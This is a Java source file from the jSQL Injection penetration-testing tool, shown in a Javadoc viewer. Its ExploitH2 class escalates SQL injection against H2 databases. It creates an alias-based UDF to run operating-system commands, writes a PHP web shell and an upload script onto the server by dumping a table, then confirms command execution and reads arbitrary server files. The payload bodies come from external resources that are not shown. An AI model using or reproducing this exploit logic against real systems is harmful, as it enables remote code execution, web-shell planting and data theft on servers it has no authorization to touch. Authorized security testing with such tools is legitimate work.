View Javadoc
1   package com.jsql.model.accessible.engine;
2   
3   import com.jsql.model.InjectionModel;
4   import com.jsql.model.accessible.DataAccess;
5   import com.jsql.model.accessible.ResourceAccess;
6   import com.jsql.model.accessible.engine.h2.ModelYamlH2;
7   import com.jsql.model.bean.database.MockElement;
8   import com.jsql.model.suspendable.Input;
9   import com.jsql.view.subscriber.Seal;
10  import com.jsql.model.exception.AbstractSlidingException;
11  import com.jsql.model.exception.JSqlException;
12  import com.jsql.model.exception.JSqlRuntimeException;
13  import com.jsql.model.suspendable.SuspendableGetRows;
14  import com.jsql.util.LogLevelUtil;
15  import com.jsql.util.StringUtil;
16  import org.apache.commons.lang3.RandomStringUtils;
17  import org.apache.commons.lang3.StringUtils;
18  import org.apache.logging.log4j.LogManager;
19  import org.apache.logging.log4j.Logger;
20  import org.yaml.snakeyaml.Yaml;
21  
22  import java.io.File;
23  import java.io.FileInputStream;
24  import java.io.IOException;
25  import java.io.InputStream;
26  import java.net.http.HttpResponse;
27  import java.util.UUID;
28  import java.util.function.BinaryOperator;
29  
30  public class ExploitH2 {
31  
32      private static final Logger LOGGER = LogManager.getRootLogger();
33      private final InjectionModel injectionModel;
34      private final ModelYamlH2 modelYaml;
35  
36      public ExploitH2(InjectionModel injectionModel) {
37          this.injectionModel = injectionModel;
38          var yaml = new Yaml();
39          this.modelYaml = yaml.loadAs(
40              injectionModel.getMediatorEngine().getH2().instance().getModelYaml().getResource().getExploit(),
41              ModelYamlH2.class
42          );
43      }
44  
45      public void createUdf() throws JSqlException {
46          LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "UDF target requirements: stack query");
47  
48          this.injectionModel.injectWithoutIndex(this.modelYaml.getRce().getDropAlias(), "alias#drop");
49          this.injectionModel.injectWithoutIndex(this.modelYaml.getRce().getCreateAlias(), "alias#create");
50          var result = this.injectionModel.getResourceAccess().getResult(String.format(
51              this.modelYaml.getRce().getRunCmd(),
52              ResourceAccess.WEB_CONFIRM_CMD +"%20"
53          ), ResourceAccess.RUN_FUNC);
54          if (result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
55              LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE UDF successful: command execution found");
56              this.injectionModel.sendToViews(new Seal.AddTabExploitUdf(this::runRce));
57          }
58      }
59  
60      public String runRce(String command, UUID uuidShell) {
61          String result;
62          try {
63              result = this.injectionModel.getResourceAccess().getResult(String.format(
64                  this.modelYaml.getRce().getRunCmd(),
65                  command.replace(StringUtils.SPACE, "%20")
66              ), ResourceAccess.RUN_FUNC);
67          } catch (JSqlException e) {
68              result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
69          }
70          this.injectionModel.sendToViews(new Seal.GetTerminalResult(
71              uuidShell,
72              result.trim() +"\n"  // missing newline on some extensions
73          ));
74          return result;
75      }
76  
77      public String createWeb(String pathExploit, String urlExploit) {
78          LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");
79  
80          String bodyExploit = StringUtil.base64Decode(
81                  this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
82              )
83              .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
84              .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
85  
86          var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
87          this.injectionModel.injectWithoutIndex(String.format(
88              this.modelYaml.getRce().getCreateTable(),
89              nameTable,
90              nameTable, bodyExploit.replace("'", "\"")
91          ), ResourceAccess.TBL_CREATE);
92          var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
93          this.injectionModel.injectWithoutIndex(String.format(
94              this.modelYaml.getRce().getScriptSimple(),
95              pathExploit + nameExploit,
96              nameTable
97          ), ResourceAccess.TBL_DUMP);
98  
99          BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
100             String result = this.injectionModel.getResourceAccess().callCommand(
101                 urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
102             );
103             if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
104                 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
105                 return StringUtils.EMPTY;
106             }
107             this.injectionModel.sendToViews(new Seal.AddTabExploitWeb(urlSuccess));
108             return urlSuccess;
109         };
110 
111         return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
112     }
113 
114     public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
115         String bodyExploit = StringUtil.base64Decode(
116                 this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
117             )
118             .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
119             .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
120 
121         var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
122         this.injectionModel.injectWithoutIndex(String.format(
123             this.modelYaml.getRce().getCreateTable(),
124             nameTable,
125             nameTable, bodyExploit.replace("'", "\"")
126         ), ResourceAccess.TBL_CREATE);
127         var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
128         this.injectionModel.injectWithoutIndex(String.format(
129             this.modelYaml.getRce().getScriptSimple(),
130             pathExploit + nameExploit,
131             nameTable
132         ), ResourceAccess.TBL_DUMP);
133 
134         BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
135             try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
136                 HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
137                 if (result.body().contains(DataAccess.LEAD +"y")) {
138                     LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
139                 } else {
140                     LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
141                 }
142             } catch (InterruptedException e) {
143                 LOGGER.log(LogLevelUtil.IGNORE, e, e);
144                 Thread.currentThread().interrupt();
145             } catch (IOException | JSqlException e) {
146                 throw new JSqlRuntimeException(e);
147             }
148             return urlSuccess;
149         };
150 
151         this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
152     }
153 
154     public String getRead(String pathFile) throws AbstractSlidingException {
155         return new SuspendableGetRows(this.injectionModel).run(new Input(
156             String.format(
157                 this.modelYaml.getFile().getReadFromPath(),
158                 pathFile
159             ),
160             new String[]{ StringUtils.EMPTY },
161             false,
162             1,
163             MockElement.MOCK,
164             ResourceAccess.FILE_READ
165         ));
166     }
167 }